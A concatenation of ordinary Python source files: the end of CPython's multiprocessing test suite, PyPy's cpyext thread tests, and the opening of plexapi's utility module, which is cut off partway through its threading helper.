e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
            obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
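# For reference (a sketch, not part of this module): the per-start-method test
# files in CPython consume install_tests_in_module_dict() by calling it against
# their own module globals, roughly like:
#
#     import unittest
#     import test._test_multiprocessing
#
#     test._test_multiprocessing.install_tests_in_module_dict(globals(), 'spawn')
#
#     if __name__ == '__main__':
#         unittest.main()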
|
test_thread.py
|
import sys
import pytest
from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase
only_pypy = "config.option.runappdirect and '__pypy__' not in sys.builtin_module_names"
class AppTestThread(AppTestCpythonExtensionBase):
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_get_thread_ident(self):
module = self.import_extension('foo', [
("get_thread_ident", "METH_NOARGS",
"""
#ifndef PyThread_get_thread_ident
#error "seems we are not accessing PyPy's functions"
#endif
return PyInt_FromLong(PyThread_get_thread_ident());
"""),
])
import thread, threading
results = []
def some_thread():
res = module.get_thread_ident()
results.append((res, thread.get_ident()))
some_thread()
assert results[0][0] == results[0][1]
th = threading.Thread(target=some_thread, args=())
th.start()
th.join()
assert results[1][0] == results[1][1]
assert results[0][0] != results[1][0]
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_acquire_lock(self):
module = self.import_extension('foo', [
("test_acquire_lock", "METH_NOARGS",
"""
#ifndef PyThread_allocate_lock
#error "seems we are not accessing PyPy's functions"
#endif
PyThread_type_lock lock = PyThread_allocate_lock();
if (PyThread_acquire_lock(lock, 1) != 1) {
PyErr_SetString(PyExc_AssertionError, "first acquire");
return NULL;
}
if (PyThread_acquire_lock(lock, 0) != 0) {
PyErr_SetString(PyExc_AssertionError, "second acquire");
return NULL;
}
PyThread_free_lock(lock);
Py_RETURN_NONE;
"""),
])
module.test_acquire_lock()
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_release_lock(self):
module = self.import_extension('foo', [
("test_release_lock", "METH_NOARGS",
"""
#ifndef PyThread_release_lock
#error "seems we are not accessing PyPy's functions"
#endif
PyThread_type_lock lock = PyThread_allocate_lock();
PyThread_acquire_lock(lock, 1);
PyThread_release_lock(lock);
if (PyThread_acquire_lock(lock, 0) != 1) {
PyErr_SetString(PyExc_AssertionError, "first acquire");
return NULL;
}
PyThread_free_lock(lock);
Py_RETURN_NONE;
"""),
])
module.test_release_lock()
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_tls(self):
module = self.import_extension('foo', [
("create_key", "METH_NOARGS",
"""
return PyInt_FromLong(PyThread_create_key());
"""),
("test_key", "METH_O",
"""
int key = PyInt_AsLong(args);
if (PyThread_get_key_value(key) != NULL) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_set_key_value(key, (void*)123) < 0) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_get_key_value(key) != (void*)123) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
Py_RETURN_NONE;
"""),
])
key = module.create_key()
assert key > 0
# Test value in main thread.
module.test_key(key)
raises(ValueError, module.test_key, key)
# Same test, in another thread.
result = []
import thread, time
def in_thread():
try:
module.test_key(key)
raises(ValueError, module.test_key, key)
except Exception as e:
result.append(e)
else:
result.append(True)
thread.start_new_thread(in_thread, ())
while not result:
print "."
time.sleep(.5)
assert result == [True]
|
utils.py
|
# -*- coding: utf-8 -*-
import logging
import os
import re
import requests
import time
import zipfile
from datetime import datetime
from getpass import getpass
from threading import Thread, Event
from tqdm import tqdm
from plexapi import compat
from plexapi.exceptions import NotFound
# Search Types - Plex uses these to filter specific media types when searching.
# Library Types - Populated at runtime
SEARCHTYPES = {'movie': 1, 'show': 2, 'season': 3, 'episode': 4, 'trailer': 5, 'comic': 6, 'person': 7,
'artist': 8, 'album': 9, 'track': 10, 'picture': 11, 'clip': 12, 'photo': 13, 'photoalbum': 14,
'playlist': 15, 'playlistFolder': 16, 'collection': 18, 'userPlaylistItem': 1001}
PLEXOBJECTS = {}
class SecretsFilter(logging.Filter):
""" Logging filter to hide secrets. """
def __init__(self, secrets=None):
self.secrets = secrets or set()
def add_secret(self, secret):
if secret is not None:
self.secrets.add(secret)
return secret
def filter(self, record):
cleanargs = list(record.args)
for i in range(len(cleanargs)):
if isinstance(cleanargs[i], compat.string_type):
for secret in self.secrets:
cleanargs[i] = cleanargs[i].replace(secret, '<hidden>')
record.args = tuple(cleanargs)
return True
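# Illustrative sketch (not part of the original module): attaching SecretsFilter
# to a logger so that a value registered via add_secret() is masked in log args.
# The logger name and token value below are made up for the example.
def _secrets_filter_example(token='abc123'):
    log = logging.getLogger('plexapi.example')
    secrets = SecretsFilter()
    secrets.add_secret(token)
    log.addFilter(secrets)
    log.warning('using token %s', token)   # renders as 'using token <hidden>'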
def registerPlexObject(cls):
""" Registry of library types we may come across when parsing XML. This allows us to
        define a few helper functions to dynamically convert the XML into objects. See
buildItem() below for an example.
"""
etype = getattr(cls, 'STREAMTYPE', cls.TYPE)
ehash = '%s.%s' % (cls.TAG, etype) if etype else cls.TAG
if ehash in PLEXOBJECTS:
raise Exception('Ambiguous PlexObject definition %s(tag=%s, type=%s) with %s' %
(cls.__name__, cls.TAG, etype, PLEXOBJECTS[ehash].__name__))
PLEXOBJECTS[ehash] = cls
return cls
def cast(func, value):
""" Cast the specified value to the specified type (returned by func). Currently this
        only supports int, float and bool. Should be extended if needed.
        Parameters:
            func (func): Callback function used to cast the value to the target type (int, bool, float).
value (any): value to be cast and returned.
"""
if value is not None:
if func == bool:
return bool(int(value))
elif func in (int, float):
try:
return func(value)
except ValueError:
return float('nan')
return func(value)
return value
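# Illustrative sketch (not part of the original module): how cast() behaves for
# the supported coercions. Unparseable numerics fall back to NaN instead of raising.
def _cast_examples():
    import math
    assert cast(bool, '0') is False          # '0' -> int 0 -> False
    assert cast(int, '42') == 42
    assert math.isnan(cast(float, 'oops'))   # ValueError is swallowed, NaN returned
    assert cast(int, None) is None           # None passes through untouched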
def joinArgs(args):
""" Returns a query string (uses for HTTP URLs) where only the value is URL encoded.
Example return value: '?genre=action&type=1337'.
Parameters:
args (dict): Arguments to include in query string.
"""
if not args:
return ''
arglist = []
for key in sorted(args, key=lambda x: x.lower()):
value = compat.ustr(args[key])
arglist.append('%s=%s' % (key, compat.quote(value)))
return '?%s' % '&'.join(arglist)
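# Illustrative sketch (not part of the original module): joinArgs() sorts keys
# case-insensitively and URL-encodes only the values.
def _joinargs_example():
    assert joinArgs({'type': 1337, 'genre': 'action'}) == '?genre=action&type=1337'
    assert joinArgs({}) == ''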
def lowerFirst(s):
return s[0].lower() + s[1:]
def rget(obj, attrstr, default=None, delim='.'): # pragma: no cover
""" Returns the value at the specified attrstr location within a nexted tree of
dicts, lists, tuples, functions, classes, etc. The lookup is done recursivley
for each key in attrstr (split by by the delimiter) This function is heavily
influenced by the lookups used in Django templates.
Parameters:
obj (any): Object to start the lookup in (dict, obj, list, tuple, etc).
attrstr (str): String to lookup (ex: 'foo.bar.baz.value')
default (any): Default value to return if not found.
delim (str): Delimiter separating keys in attrstr.
"""
try:
parts = attrstr.split(delim, 1)
attr = parts[0]
attrstr = parts[1] if len(parts) == 2 else None
if isinstance(obj, dict):
value = obj[attr]
elif isinstance(obj, list):
value = obj[int(attr)]
elif isinstance(obj, tuple):
value = obj[int(attr)]
elif isinstance(obj, object):
value = getattr(obj, attr)
if attrstr:
return rget(value, attrstr, default, delim)
return value
except: # noqa: E722
return default
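# Illustrative sketch (not part of the original module): rget() walks nested
# containers with a dotted path and falls back to the default on any failure.
# The sample data below is made up for the example.
def _rget_example():
    data = {'media': {'parts': [{'file': '/movies/a.mkv'}]}}
    assert rget(data, 'media.parts.0.file') == '/movies/a.mkv'
    assert rget(data, 'media.missing', default='n/a') == 'n/a'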
def searchType(libtype):
""" Returns the integer value of the library string type.
Parameters:
libtype (str): LibType to lookup (movie, show, season, episode, artist, album, track,
collection)
Raises:
:class:`plexapi.exceptions.NotFound`: Unknown libtype
"""
libtype = compat.ustr(libtype)
if libtype in [compat.ustr(v) for v in SEARCHTYPES.values()]:
return libtype
if SEARCHTYPES.get(libtype) is not None:
return SEARCHTYPES[libtype]
raise NotFound('Unknown libtype: %s' % libtype)
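# Illustrative sketch (not part of the original module): mapping a libtype
# string to the integer Plex uses in search filters.
def _searchtype_example():
    assert searchType('movie') == 1
    assert searchType('episode') == 4
    try:
        searchType('not-a-type')
    except NotFound:
        pass                                 # unknown libtypes raise NotFound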
def threaded(callback, listargs):
""" Returns the result of <callback> for each set of \*args in listargs. Each call
to <callback> is called concurrently in their own separate threads.
Parameters:
callback (func): Callback function to apply to each set of \*args.
listargs (list): List of lists; \*args to pass each thread.
"""
threads, results = [], []
job_is_done_event = Event()
for args in listargs:
args += [results, len(results)]
results.append(None)
threads.append(Thread(target=callback, args=args, kwargs=dict(job_is_done_event=job_is_done_event)))
